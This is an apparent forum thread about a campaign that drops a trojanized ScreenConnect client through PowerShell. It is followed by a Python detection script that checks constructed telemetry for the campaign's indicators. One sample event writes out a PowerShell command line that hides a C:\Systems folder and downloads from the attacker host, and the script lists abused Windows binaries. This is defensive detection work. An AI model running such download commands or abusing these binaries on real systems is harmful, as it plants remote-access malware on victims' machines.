• NickeeCoco@piefed.social · 16 points · 11 days ago

    The embedded PowerShell code creates a hidden folder at C:\Systems and downloads a trojanized ScreenConnect package from legitserver.theworkpc[.]com over TCP port 5443.

    Nothing to see here, just a legit server doing work with the systems.

  • Anon518@sh.itjust.works · 6 points · 11 days ago

    Security teams are advised to block or closely monitor execution of commonly abused Windows binaries including csc.exe, cvtres.exe, and ComputerDefaults.exe. Organizations should enforce strict controls over remote access platforms, deploy detection rules for suspicious PowerShell behavior, and isolate any system showing unexpected ScreenConnect activity. Credential resets for all privileged accounts are strongly recommended following any suspected exposure.

    So all Windows users without a “security team” are vulnerable to this extremely simple & powerful attack for the foreseeable future???
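For anyone who wants to turn the quoted advice into something that actually runs, here is an added example (not code from the article or from either commenter): a small detection pass over endpoint telemetry that flags the indicators named in this thread, namely csc.exe / cvtres.exe / ComputerDefaults.exe execution, PowerShell creating a hidden `C:\Systems` folder, a ScreenConnect binary running from outside its normal install location, and connections to `legitserver.theworkpc[.]com` on TCP 5443. The event schema, the sample events, the parent-process allowlist and the ScreenConnect install-path allowlist are all assumptions made for this example.

```python
"""Detection pass over constructed endpoint telemetry.

Added example: not code from the article or from either commenter. The
indicators are the ones quoted in the thread (csc.exe, cvtres.exe and
ComputerDefaults.exe execution; PowerShell creating a hidden C:\\Systems
folder; a download from legitserver.theworkpc[.]com over TCP 5443). The
event schema, the sample events, the parent-process allowlist and the
ScreenConnect install-path allowlist are assumptions made for this example.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Binaries the quoted advice says to block or closely monitor.
WATCHED_BINARIES = {"csc.exe", "cvtres.exe", "computerdefaults.exe"}

# Assumption: csc.exe/cvtres.exe are routine under build tooling, so only
# flag them when the parent is something else (e.g. powershell.exe).
EXPECTED_PARENTS = {"msbuild.exe", "devenv.exe", "dotnet.exe"}

IOC_HOST = "legitserver.theworkpc.com"  # written defanged in the thread
IOC_PORT = 5443

# Assumption: the hidden folder shows up in the command line either as
# `attrib +h ... C:\Systems` or as C:\Systems followed by a Hidden attribute.
HIDDEN_SYSTEMS_DIR = re.compile(
    r"(attrib\s+\+h\b.*c:\\systems\b)|(c:\\systems\b.*\bhidden\b)", re.I)

# Assumption: a sanctioned ScreenConnect client lives under Program Files.
SCREENCONNECT_OK_PREFIXES = ("c:\\program files\\", "c:\\program files (x86)\\")


@dataclass(frozen=True)
class Alert:
    rule: str
    host: str
    detail: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def inspect_process(ev: dict) -> list[Alert]:
    """Rules for one process-creation event."""
    image, parent = _basename(ev["image"]), _basename(ev.get("parent", ""))
    cmd = ev.get("cmdline", "")
    out: list[Alert] = []
    if image in WATCHED_BINARIES and parent not in EXPECTED_PARENTS:
        out.append(Alert("lolbin-exec", ev["host"], f"{image} <- {parent or '?'}"))
    if image in {"powershell.exe", "pwsh.exe"}:
        if HIDDEN_SYSTEMS_DIR.search(cmd):
            out.append(Alert("hidden-systems-dir", ev["host"], cmd))
        if IOC_HOST in cmd.lower():
            out.append(Alert("ioc-host-in-cmdline", ev["host"], cmd))
    if "screenconnect" in image and not ev["image"].lower().startswith(SCREENCONNECT_OK_PREFIXES):
        out.append(Alert("screenconnect-unexpected-path", ev["host"], ev["image"]))
    return out


def inspect_network(ev: dict) -> list[Alert]:
    """Rules for one outbound-connection event."""
    where = f"{_basename(ev['image'])} -> {ev['dest_host']}:{ev['dest_port']}"
    if ev["dest_host"].lower() == IOC_HOST:
        return [Alert("ioc-host-connection", ev["host"], where)]
    if ev["dest_port"] == IOC_PORT:  # port alone is weaker evidence; keep for triage
        return [Alert("ioc-port-connection", ev["host"], where)]
    return []


def detect(events: list[dict]) -> list[Alert]:
    out: list[Alert] = []
    for ev in events:
        out += inspect_process(ev) if ev["type"] == "process" else inspect_network(ev)
    return out


# Rules strong enough on their own to justify isolating the host, following the
# quoted advice to isolate systems showing unexpected ScreenConnect activity.
ISOLATE_RULES = {"screenconnect-unexpected-path", "ioc-host-connection", "ioc-host-in-cmdline"}


def hosts_to_isolate(alerts: list[Alert]) -> set[str]:
    return {a.host for a in alerts if a.rule in ISOLATE_RULES}


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
NET = "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\"

# Constructed sample telemetry (not real logs); WS-07 plays the infected host,
# BUILD-01 and HELPDESK-02 are benign machines that must not fire.
EVENTS = [
    {"type": "process", "host": "WS-07", "image": PS, "parent": "C:\\Windows\\explorer.exe",
     "cmdline": "powershell.exe -c \"$d=New-Item -ItemType Directory C:\\Systems; "
                "$d.Attributes='Hidden'; Invoke-WebRequest https://legitserver.theworkpc.com:5443/ "
                "-OutFile C:\\Systems\\client.msi\""},
    {"type": "process", "host": "WS-07", "image": NET + "csc.exe", "parent": PS},
    {"type": "process", "host": "WS-07", "image": NET + "cvtres.exe", "parent": NET + "csc.exe"},
    {"type": "process", "host": "BUILD-01", "image": NET + "csc.exe",
     "parent": "C:\\Program Files\\MSBuild\\MSBuild.exe"},
    {"type": "process", "host": "WS-07", "image": "C:\\Windows\\System32\\ComputerDefaults.exe", "parent": PS},
    {"type": "process", "host": "WS-07", "image": "C:\\Systems\\ScreenConnect.ClientService.exe"},
    {"type": "network", "host": "WS-07", "image": PS, "dest_host": "legitserver.theworkpc.com", "dest_port": 5443},
    {"type": "process", "host": "HELPDESK-02",
     "image": "C:\\Program Files (x86)\\ScreenConnect Client (a1b2c3)\\ScreenConnect.ClientService.exe"},
]

if __name__ == "__main__":
    found = detect(EVENTS)
    for a in found:
        print(f"[{a.rule}] {a.host}: {a.detail}")
    print("isolate:", sorted(hosts_to_isolate(found)))
```

The two allowlists are where the false positives live: csc.exe spawned by MSBuild on a build box is skipped, and a ScreenConnect client under Program Files is treated as sanctioned, so the same binary running from the hidden `C:\Systems` folder is what trips the isolate rule. Everything else on the page (credential resets for privileged accounts after exposure) is a response step, not something a detector can do for you.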